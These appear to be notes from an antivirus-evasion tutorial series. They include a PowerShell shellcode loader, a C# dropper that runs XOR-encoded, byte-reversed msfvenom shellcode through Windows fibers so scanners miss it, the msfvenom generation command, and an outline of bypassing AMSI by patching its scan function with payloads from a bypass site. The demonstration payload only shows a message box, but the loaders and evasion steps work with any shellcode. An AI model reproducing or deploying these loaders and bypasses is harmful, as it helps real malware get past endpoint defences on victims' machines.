[Byte[]] $buf = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x3e,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x6f,0x48,0x1,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x3e,0x41,0x8b,0xc,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x3e,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x0,0x0,0x0,0x0,0x3e,0x48,0x8d,0x95,0xfe,0x0,0x0,0x0,0x3e,0x4c,0x8d,0x85,0xf,0x1,0x0,0x0,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x7,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x0,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x0

$size = $buf.Length
[IntPtr]$addr = [Kernel32]::VirtualAlloc(0, $size, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)
$thandle=[Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0)
[kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

This script is flagged by AMSI easily:

What is AMSI?

AMSI scans for malicious activity in memory.

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads.

AMSI is agnostic of antimalware vendor; it's designed to allow for the most common malware scanning and protection techniques provided by today's antimalware products that can be integrated into applications. It supports a calling structure allowing for file and memory or stream scanning, content source URL/IP reputation checks, and other techniques.

AMSI Bypass

However, I have tried many payloads and all of them are blocked by the latest Win11. We will investigate more in the "AMSI Bypass" section.

AV Evasion with Fibers

What is Fiber?

A fiber is a thread inside of a thread.

https://docs.microsoft.com/en-us/windows/win32/procthread/fibers

A fibe is a unit of execution that must be manually scheduled by the application. Fibers run in the context of the threads that schedule them. Each thread can schedule multiple fibers. In general, fibers do not provide advantages over a well-designed multithreaded application. However, using fibers can make it easier to port applications that were designed to schedule their own threads.

Fibers give us an alternative way to execute shellcode on a host in a manner that AV is not used to scanning.

Thread -> Fiber

Generate encoded MessageBox payload with msfvenom:

msfvenom -p windows/x64/messagebox -f csharp -e x64/xor_dynamic

Upadte Dropper.cs:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		[DllImport("kernel32.dll")]
		static extern IntPtr ConvertThreadToFiber(IntPtr lpParameter);

		[DllImport("kernel32.dll")]
		static extern IntPtr CreateFiber(uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter);

		[DllImport("kernel32.dll")]
		extern static IntPtr SwitchToFiber(IntPtr fiberAddress);

		static void Main(string[] args)
		{
			// msfvenom -p windows/x64/messagebox -f csharp -e x64/xor_dynamic
			byte[] waffle = new byte[345] { 
				0x3b, 0xc8, 0x10, 0x68, 0x7f, 0x52, 0x75, 0x77, 0x71, 0x63, 0x63, 0x75, 0x5d, 0x10, 0x31, 0x56, 0x43, 0x5d, 0x30, 0x7d, 0x7f, 0x62, 0x76, 0x30, 0x3c, 0x7f, 0x7c, 0x7c, 0x75, 0x58, 0xc5, 0xef, 0x46, 0xb2, 0xa5, 0xe0, 0xaa, 0x51, 0xd9, 0x21, 0x58, 0xc5, 0xef, 0x17, 0x46, 0x93, 0x55, 0xaa, 0x51, 0xd9, 0x21, 0x58, 0x10, 0x10, 0x11, 0x1f, 0x95, 0x9d, 0x5c, 0x2e, 0x10, 0x10, 0x10, 0xee, 0x85, 0x9d, 0x58, 0x2e, 0x10, 0x10, 0x10, 0x10, 0xd1, 0xd7, 0x59, 0x4d, 0xef, 0xef, 0xef, 0x59, 0xf9, 0x02, 0x9b, 0x58, 0x2e, 0x4a, 0x49, 0x51, 0x48, 0xf0, 0xef, 0x42, 0x51, 0x30, 0xfc, 0x93, 0x58, 0x4a, 0x51, 0x49, 0x51, 0x48, 0x51, 0x4a, 0x49, 0x4e, 0x48, 0x51, 0x48, 0x51, 0xc0, 0x11, 0x58, 0x98, 0x14, 0x9b, 0x51, 0x2e, 0xc0, 0x11, 0x59, 0x0c, 0x50, 0x9b, 0x54, 0x2e, 0x58, 0x1c, 0x9b, 0x51, 0x2e, 0x76, 0xc0, 0x11, 0x59, 0x34, 0x50, 0x9b, 0x54, 0x2e, 0x48, 0xc6, 0x65, 0xc1, 0x29, 0x55, 0x18, 0x34, 0x5c, 0x13, 0x5c, 0x2e, 0xe1, 0x65, 0xf0, 0x28, 0xd1, 0x11, 0x51, 0x1d, 0xd9, 0xd1, 0x51, 0xbc, 0xd0, 0x21, 0x58, 0xd9, 0x21, 0x5d, 0xc6, 0x11, 0x58, 0x98, 0x24, 0x9b, 0x51, 0x2e, 0xd9, 0xef, 0x58, 0x4c, 0xf3, 0xc0, 0x11, 0x59, 0x30, 0x50, 0x9b, 0x54, 0x2e, 0x08, 0x58, 0x9b, 0x2e, 0x40, 0xc0, 0x11, 0x58, 0x7f, 0x64, 0xd0, 0x95, 0x58, 0x10, 0x10, 0x10, 0x98, 0x90, 0x9b, 0x2e, 0xc0, 0x11, 0x58, 0x2c, 0x52, 0x9b, 0x2e, 0x30, 0x42, 0x9b, 0x58, 0x2e, 0x41, 0x51, 0x42, 0xfd, 0xf2, 0xd1, 0x11, 0x51, 0x1d, 0xd9, 0xd1, 0x51, 0x30, 0x3c, 0x12, 0x6c, 0x71, 0x2c, 0xbc, 0xd0, 0x21, 0x58, 0xd9, 0x21, 0x5d, 0x5a, 0x5a, 0xa7, 0x1f, 0x58, 0x2e, 0x40, 0x62, 0x9b, 0x58, 0x2e, 0x30, 0x42, 0x9b, 0x58, 0x2e, 0x08, 0x42, 0x9b, 0x58, 0x2e, 0x70, 0x42, 0x9b, 0x58, 0x75, 0xc2, 0x21, 0x58, 0x46, 0x41, 0x42, 0x40, 0x51, 0x41, 0x51, 0x10, 0x10, 0x10, 0xc0, 0xf8, 0xef, 0xef, 0xef, 0xe0, 0xf4, 0x91, 0x58, 0xec, 0x3b, 0x10, 0xff, 0xff, 0xff, 0xd4, 0xe8, 0xe1, 0xff, 0xe6, 0xeb, 0xea, 0x75, 0x3b, 0x3e, 0x80, 0x07, 0x74, 0x3b, 0xc8, 0x3f, 0x81, 0x66, 0xc6, 0xff, 0x48, 0xc7, 0xff, 0x48, 0x07, 0x30, 0x06, 0x8a, 0x5e, 0x53, 0x59, 0x57, 0xfd, 0x75, 0xae, 0xfc, 0x3b, 0xb0, 0x5f, 0x53, 0x5b, 0x27, 0xeb
			};

			Array.Reverse(waffle);

			int size = waffle.Length;
			var MasterFiber = ConvertThreadToFiber(IntPtr.Zero);
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(waffle, 0, addr, size);
			IntPtr hFiber = CreateFiber(0, addr, IntPtr.Zero);
			SwitchToFiber(hFiber);
		}
	}
}

Build it and upload the executable to VirusTotal:

Reference

We can obfuscate the payload with the "double reverse" technique: reverse the shellcode and then call Array.Reverse().

At a high level, once PowerShell is invoked, amsi.dll is injected into the process and executed. AMSI_Scan_Buffer is then used to scan for malicious activity. Because of the way AMSI is currently implemented, the namespace can also patch back into it. Matt Graber wrote the original AMSI bypass for patching the Scan Buffer function to all return clean . This has been "fixed" by Microsoft by adding that as a known malicious signature. However, signature detection isn't very good and can be bypassed fairly easily. The site was setup to create AMSI bypasses. We can easily pull down a payload and get around AMSI to allow our script to run. We will need to keep trying payloads in PowerShell until one works as intended.

here
here
amsi.fail
VirusTotal
msgbox64 VirusTotal
AV Evasion 1 VirusTotal
PowerShell dropper flagged by AMSI
AV Evasion 4 VirusTotal
AV Evasion Part 1 ยท Hop Infosec
AV Evasion Part 1
AV Evasion Part 2, The disk is lava ยท Hop Infosec
AV Evasion Part 2
Logo
Logo
AV Evasion Part 3: Fibers ยท Hop Infosec
AV Evasion Part 3
Logo